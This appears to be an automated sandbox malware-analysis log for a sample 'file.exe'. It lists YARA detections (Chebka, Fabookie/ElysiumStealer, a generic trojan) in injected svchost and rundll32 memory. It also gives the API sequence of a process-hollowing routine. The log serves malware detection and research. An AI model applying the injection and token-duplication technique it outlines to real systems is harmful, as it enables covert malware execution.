      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5292, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 368, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 2112, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 2372, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 2340, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1512, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1148, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 2564, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1080, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4724, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1492, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1924, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1364, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3584, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1204, type: MEMORYSTR
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004085E40_2_004085E4
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040CCF90_2_0040CCF9
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004031400_2_00403140
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040DE410_2_0040DE41
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040D23B0_2_0040D23B
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040D77D0_2_0040D77D
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402B1A0_2_00402B1A
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040EB3A0_2_0040EB3A
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00403FFB0_2_00403FFB
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0427AC3010_2_0427AC30
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0425BC1010_2_0425BC10
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04251C6010_2_04251C60
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0425C56010_2_0425C560
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0427156010_2_04271560
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04276D8010_2_04276D80
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04285F5010_2_04285F50
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04290FE110_2_04290FE1
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0428D81110_2_0428D811
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0425C9B010_2_0425C9B0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0427B31010_2_0427B310
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04287B4810_2_04287B48
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0427CB4010_2_0427CB40
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04269910 WaitForSingleObject,GetVersionExW,GetProcAddress,OpenProcess,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetSystemDirectoryW,wsprintfW,CloseHandle,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,Sleep,CloseHandle,CreateProcessW,LoadLibraryA,GetProcAddress,CloseHandle,GetThreadContext,VirtualAllocEx,TerminateProcess,GetCurrentProcess,OpenProcessToken,DuplicateTokenEx,SetTokenInformation,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CreateProcessAsUserW,CloseHandle,CloseHandle,CloseHandle,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,Sleep,Sleep,Sleep,Sleep,Sleep,CloseHandle,WaitForSingleObject,OpenThread,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,WaitForSingleObject,CloseHandle,10_2_04269910
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04263A60 OpenSCManagerW,OpenServiceW,QueryServiceStatus,ControlService,Sleep,DeleteService,wsprintfW,SHDeleteKeyW,CloseServiceHandle,CloseServiceHandle,10_2_04263A60
      Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 37.0.svchost.exe.28291080000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 37.0.svchost.exe.28291080000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 37.0.svchost.exe.28291080000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 37.2.svchost.exe.28291080000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 37.2.svchost.exe.28291080000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 37.2.svchost.exe.28291080000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 35.0.svchost.exe.23e495b0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 35.0.svchost.exe.23e495b0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 35.0.svchost.exe.23e495b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 41.0.svchost.exe.2b6680f0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 41.0.svchost.exe.2b6680f0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 41.0.svchost.exe.2b6680f0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 24.0.svchost.exe.2468b5b0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 24.0.svchost.exe.2468b5b0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 24.0.svchost.exe.2468b5b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 41.2.svchost.exe.2b6680f0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 41.2.svchost.exe.2b6680f0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 41.2.svchost.exe.2b6680f0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 29.0.svchost.exe.236f3940000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 29.0.svchost.exe.236f3940000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 29.0.svchost.exe.236f3940000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 34.0.svchost.exe.1af63d40000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 34.0.svchost.exe.1af63d40000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 34.0.svchost.exe.1af63d40000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 27.0.svchost.exe.195990b0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 27.0.svchost.exe.195990b0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 27.0.svchost.exe.195990b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 24.2.svchost.exe.2468b5b0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 24.2.svchost.exe.2468b5b0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 24.2.svchost.exe.2468b5b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 30.0.svchost.exe.21bd8470000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 30.0.svchost.exe.21bd8470000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 30.0.svchost.exe.21bd8470000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 30.2.svchost.exe.21bd8470000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 30.2.svchost.exe.21bd8470000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 30.2.svchost.exe.21bd8470000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 15.2.svchost.exe.1b37c560000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 15.2.svchost.exe.1b37c560000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 15.2.svchost.exe.1b37c560000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 20.0.svchost.exe.1dbfc920000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 20.0.svchost.exe.1dbfc920000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 20.0.svchost.exe.1dbfc920000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 22.0.svchost.exe.1b6d6000000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 22.0.svchost.exe.1b6d6000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 22.0.svchost.exe.1b6d6000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 26.0.svchost.exe.226f8d40000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 26.0.svchost.exe.226f8d40000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 26.0.svchost.exe.226f8d40000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 29.2.svchost.exe.236f3940000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 29.2.svchost.exe.236f3940000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 29.2.svchost.exe.236f3940000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 35.2.svchost.exe.23e495b0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 35.2.svchost.exe.23e495b0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 35.2.svchost.exe.23e495b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 36.2.svchost.exe.1dd8fdb0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 36.2.svchost.exe.1dd8fdb0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 36.2.svchost.exe.1dd8fdb0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 10.2.rundll32.exe.4250000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 10.2.rundll32.exe.4250000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Fabookie author = ditekSHen, description = Detects Fabookie / ElysiumStealer
      Source: 10.2.rundll32.exe.4250000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 10.2.rundll32.exe.4250000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 36.0.svchost.exe.1dd8fdb0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 36.0.svchost.exe.1dd8fdb0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 36.0.svchost.exe.1dd8fdb0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 33.0.svchost.exe.1e554740000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 33.0.svchost.exe.1e554740000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 33.0.svchost.exe.1e554740000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 21.0.svchost.exe.1f97f120000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 21.0.svchost.exe.1f97f120000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 21.0.svchost.exe.1f97f120000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 13.2.svchost.exe.1a748340000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 13.2.svchost.exe.1a748340000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 13.2.svchost.exe.1a748340000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 34.2.svchost.exe.1af63d40000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 34.2.svchost.exe.1af63d40000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 34.2.svchost.exe.1af63d40000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 22.2.svchost.exe.1b6d6000000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 22.2.svchost.exe.1b6d6000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
